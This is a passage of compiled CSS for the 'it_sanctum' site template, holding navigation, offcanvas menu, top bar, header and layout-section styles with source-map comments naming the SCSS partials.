  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
/* line 78, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown .g-menu-item-container {
  color: #fff;
  padding: 12px 15px;
}
/* line 85, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown li {
  border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 88, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
/* line 93, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 95, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #fff;
  font-weight: normal;
}
/* line 98, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container > .g-selected {
  color: #fff;
  font-weight: normal;
  background: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 106, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  background: #4f953b;
  color: #fff;
}
/* line 109, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container > .g-selected {
  background: #4f953b;
  color: #fff;
}
/* line 115, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 116, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  color: #fff;
}
/* line 120, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 121, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
/* line 132, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 133, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 134, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li.g-menu-item-type-particle:hover > .g-menu-item-container {
  background: inherit;
}
/* line 142, templates/it_sanctum/scss/sanctum/_menu.scss */
@media only all and (max-width: 47.938rem) {
  #g-navigation .g-menu-block {
    display: none;
  }
}
/* line 147, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-menu-item-subtitle {
  font-size: 0.75rem;
  font-weight: normal;
  opacity: 1;
  padding-top: 5px;
}
/* line 155, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 156, templates/it_sanctum/scss/sanctum/_menu.scss */
.menu-item-particle a {
  color: #4f953b;
}
/* line 158, templates/it_sanctum/scss/sanctum/_menu.scss */
.menu-item-particle a:hover {
  color: #008056;
}
/* line 1, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas {
  background: #fff;
  width: 17rem;
  color: #959595;
}
/* line 5, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas a {
  color: #fff;
}
/* line 7, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas a:hover {
  color: #959595;
}
/* line 12, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas h1, #g-offcanvas h2, #g-offcanvas h3, #g-offcanvas h4, #g-offcanvas h5, #g-offcanvas h6, #g-offcanvas strong {
  color: #959595;
}
/* line 16, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button {
  background: #282828;
  color: #959595;
}
/* line 19, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button:hover {
  background: #353535;
}
/* line 22, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button:active {
  background: #1b1b1b;
}
/* line 29, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-toggle {
  font-size: 1.6rem;
  color: #959595;
  text-align: center;
  top: 0;
  left: initial;
  position: relative;
}
/* line 38, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 61, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 63, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul {
  background: #fff;
}
/* line 65, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li {
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
/* line 67, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-type-particle {
  display: none !important;
}
/* line 70, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li > .g-menu-item-container {
  color: #959595;
  border-bottom: 1px solid #f0f0f0;
}
/* line 74, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 75, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active {
  background: #f7f7f7;
}
/* line 78, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover > .g-menu-item-container, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #626262;
}
/* line 82, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 83, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #fff;
  background: #4f953b;
}
/* line 89, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 90, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 91, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  color: #fff;
  background: rgba(0, 0, 0, 0.3);
  -webkit-transition: background 0.2s, color 0.2s, border-color 0.2s;
  -moz-transition: background 0.2s, color 0.2s, border-color 0.2s;
  transition: background 0.2s, color 0.2s, border-color 0.2s;
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
/* line 95, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:hover {
  background: rgba(0, 0, 0, 0.5);
}
/* line 101, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:after {
  content: "\f105";
  opacity: 0.75;
}
/* line 108, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 109, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator {
  padding-right: 0.2rem;
}
/* line 110, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator:after {
  content: "\f105";
}
/* line 117, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul .g-dropdown-column {
  width: 17rem;
}
/* line 124, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-mobilemenu-container {
  margin: -1.563rem;
}
/* line 129, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-nav-overlay, .g-menu-overlay {
  background: rgba(0, 0, 0, 0.6);
}
@media print {
  /* line 134, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  #g-offcanvas {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 140, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 141, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 142, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 143, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-page-surround {
  left: 17rem;
}
/* line 148, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-page-surround {
  right: 17rem;
}
/* line 156, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open .g-nav-overlay {
  z-index: 1010;
}
/* line 160, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 161, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 162, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 163, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 17rem;
}
/* line 168, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 170, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: -17rem;
}
/* line 178, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 181, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 182, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 0;
}
/* line 187, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 188, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 189, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: 0;
}
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  /* line 199, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 200, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-nav-overlay {
    z-index: 1010;
  }
  /* line 203, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 204, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 205, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open .g-offcanvas-left #g-top.uk-active {
    margin-left: 17rem;
  }
  /* line 210, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 211, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 212, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open .g-offcanvas-right #g-top.uk-active {
    margin-left: -17rem;
  }
  /* line 219, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 220, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 221, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 222, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-closing .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-left #g-top.uk-active {
    margin-left: 0;
  }
  /* line 227, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 228, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 229, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-closing .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-right #g-top.uk-active {
    margin-left: 0;
  }
}
/* line 237, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 238, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-header.uk-active, #g-top.uk-active {
  -webkit-transition: margin 0.3s;
  -moz-transition: margin 0.3s;
  transition: margin 0.3s;
}
/* line 243, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-nav-overlay, .g-menu-overlay {
  -webkit-transition: opacity 0.3s ease-out 0s, z-index 0s;
  -moz-transition: opacity 0.3s ease-out 0s, z-index 0s;
  transition: opacity 0.3s ease-out 0s, z-index 0s;
}
/* line 1, templates/it_sanctum/scss/sanctum/_drawer.scss */
#g-drawer {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_drawer.scss */
#g-drawer h1, #g-drawer h2, #g-drawer h3, #g-drawer h4, #g-drawer h5, #g-drawer h6, #g-drawer strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_drawer.scss */
  #g-drawer {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top {
  background-color: #fff;
  border-bottom: 1px solid #f0f0f0;
  color: #959595;
  z-index: 1003;
  font-size: 0.81rem;
}
/* line 11, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top h1, #g-top h2, #g-top h3, #g-top h4, #g-top h5, #g-top h6, #g-top strong {
  color: #282828;
}
/* line 17, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
/* line 24, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 25, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-block:last-child {
  text-align: right;
}
/* line 28, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-block:first-child {
  text-align: left;
}
/* line 33, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top > .g-container {
  position: relative;
}
/* line 38, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav {
  font-size: 0.81rem;
  font-family: "Lato";
}
/* line 41, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 42, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li {
  border-right: 1px solid #f0f0f0;
  margin: 0;
  margin-left: -4px;
}
/* line 46, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
/* line 50, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:last-child {
  margin-left: -4px;
}
/* line 52, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding: 9.125px 15px;
}
/* line 56, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container {
  padding: 9.125px 15px;
  line-height: inherit;
  color: #959595;
}
/* line 60, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #959595;
}
/* line 62, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
/* line 66, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 67, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "\f107";
  opacity: 0.75;
  border: 1px solid #ddd;
  background: #f7f7f7;
  margin-left: 5px;
  border-radius: 4px;
  width: 1.5rem;
  text-align: center;
  line-height: 1;
}
/* line 80, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 81, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:hover > .g-menu-item-container {
  color: #4f953b;
}
/* line 87, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown {
  background: #fff;
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
/* line 91, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown a {
  color: #959595;
  padding: 9px 15px;
}
/* line 95, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown li {
  border-bottom: 1px solid #ddd;
}
/* line 98, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
/* line 103, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #959595;
  font-weight: normal;
}
/* line 110, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 111, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li:hover > .g-menu-item-container {
  background: #ddd;
  color: #626262;
}
/* line 117, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
/* line 121, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  top: 9px;
}
/* line 127, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-social a {
  width: 2.5rem;
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  #g-top .g-social a {
    width: 2rem;
  }
}
/* line 137, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate {
  margin: 0;
  text-align: right;
}
/* line 140, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 141, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button {
  margin-bottom: -1px;
}
/* line 143, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 0.75rem;
}
/* line 146, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  padding: 0 0.75rem;
}
/* line 153, templates/it_sanctum/scss/sanctum/_top.scss */
@media only all and (max-width: 47.938rem) {
  #g-top .size-50 {
    flex-basis: 50%;
  }
}
@media print {
  /* line 161, templates/it_sanctum/scss/sanctum/_top.scss */
  #g-top {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header {
  background-color: #fff;
  color: #959595;
  position: relative;
  z-index: 2;
  text-align: center;
}
/* line 14, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header h1, #g-header h2, #g-header h3, #g-header h4, #g-header h5, #g-header h6, #g-header strong {
  color: #282828;
}
/* line 18, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header .g-container {
  position: relative;
}
/* line 22, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 3rem;
  margin-bottom: 2.5rem;
}
@media print {
  /* line 31, templates/it_sanctum/scss/sanctum/_header.scss */
  #g-header {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
#g-breadcrumb {
  padding: 1rem 0;
  background-color: #fff;
  background-image: url('../../images/bread.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
#g-breadcrumb h1, #g-breadcrumb h2, #g-breadcrumb h3, #g-breadcrumb h4, #g-breadcrumb h5, #g-breadcrumb h6, #g-breadcrumb strong {
  color: #282828;
}
@media only all and (max-width: 47.938rem) {
  #g-breadcrumb {
    text-align: center;
  }
}
@media print {
  /* line 20, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
  #g-breadcrumb {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth {
  padding: 0;
  background-color: #f7f7f7;
  color: #008056;
}
/* line 3, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth > .g-container {
  width: 100%;
  padding: 0;
  margin: 0;
}
/* line 8, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth .g-content {
  padding: 0;
  margin: 0;
}
/* line 20, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth h1, #g-fullwidth h2, #g-fullwidth h3, #g-fullwidth h4, #g-fullwidth h5, #g-fullwidth h6, #g-fullwidth strong {
  color: #282828;
}
@media print {
  /* line 26, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
  #g-fullwidth {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_showcase.scss */
#g-showcase {
  padding: 3rem 0;
  background-color: #fff;
  color: #006142;
}
/* line 11, templates/it_sanctum/scss/sanctum/_showcase.scss */
#g-showcase h1, #g-showcase h2, #g-showcase h3, #g-showcase h4, #g-showcase h5, #g-showcase h6, #g-showcase strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_showcase.scss */
  #g-showcase {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_intro.scss */
#g-intro {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #2b2b2b;
}
/* line 11, templates/it_sanctum/scss/sanctum/_intro.scss */
#g-intro h1, #g-intro h2, #g-intro h3, #g-intro h4, #g-intro h5, #g-intro h6, #g-intro strong {
  color: #008056;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_intro.scss */
  #g-intro {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_feature.scss */
#g-feature {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_feature.scss */
#g-feature h1, #g-feature h2, #g-feature h3, #g-feature h4, #g-feature h5, #g-feature h6, #g-feature strong {
  color: #68ad53;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_feature.scss */
  #g-feature {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_subfeature.scss */
#g-subfeature {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_subfeature.scss */
#g-subfeature h1, #g-subfeature h2, #g-subfeature h3, #g-subfeature h4, #g-subfeature h5, #g-subfeature h6, #g-subfeature strong {
  color: #68ad53;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_subfeature.scss */
  #g-subfeature {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_utility.scss */
#g-utility {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_utility.scss */
#g-utility h1, #g-utility h2, #g-utility h3, #g-utility h4, #g-utility h5, #g-utility h6, #g-utility strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_utility.scss */
  #g-utility {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_maintop.scss */
#g-maintop {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_maintop.scss */
#g-maintop h1, #g-maintop h2, #g-maintop h3, #g-maintop h4, #g-maintop h5, #g-maintop h6, #g-maintop strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_maintop.scss */
  #g-maintop {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#g-system-messages {
  background-color: #fff;
  color: #959595;
}
/* line 10, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#g-system-messages h1, #g-system-messages h2, #g-system-messages h3, #g-system-messages h4, #g-system-messages h5, #g-system-messages h6, #g-system-messages strong {
  color: #282828;
}
@media print {
  /* line 16, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
  #g-system-messages {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 22, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
/* line 23, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message {
  padding: 0;
}
/* line 25, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert {
  padding: 25px;
  margin: 4.563rem 1.563rem 0 1.563rem;
}
/* line 28, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert .close {
  position: static;
}
/* line 30, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert .close:hover {
  text-decoration: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert p {
  margin: 15px 0 0 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar h1, #g-sidebar h2, #g-sidebar h3, #g-sidebar h4, #g-sidebar h5, #g-sidebar h6, #g-sidebar strong {
  color: #282828;
}
/* line 15, templates/it_sanctum/scss/sanctum/_sidebar.scss */
/* line 16, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 19, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 23, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_sidebar.scss */
/* line 28, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #ddd;
}
/* line 32, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  /* line 40, templates/it_sanctum/scss/sanctum/_sidebar.scss */
  #g-sidebar {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_mainbody.scss */
#g-mainbody {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_mainbody.scss */
#g-mainbody h1, #g-mainbody h2, #g-mainbody h3, #g-mainbody h4, #g-mainbody h5, #g-mainbody h6, #g-mainbody strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_mainbody.scss */
  #g-mainbody {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside h1, #g-aside h2, #g-aside h3, #g-aside h4, #g-aside h5, #g-aside h6, #g-aside strong {
  color: #282828;
}
/* line 14, templates/it_sanctum/scss/sanctum/_aside.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 18, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 22, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 26, templates/it_sanctum/scss/sanctum/_aside.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #ddd;
}
/* line 31, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  /* line 39, templates/it_sanctum/scss/sanctum/_aside.scss */
  #g-aside {
    background: #fff !important;
    color: #000 !important;
  }
}
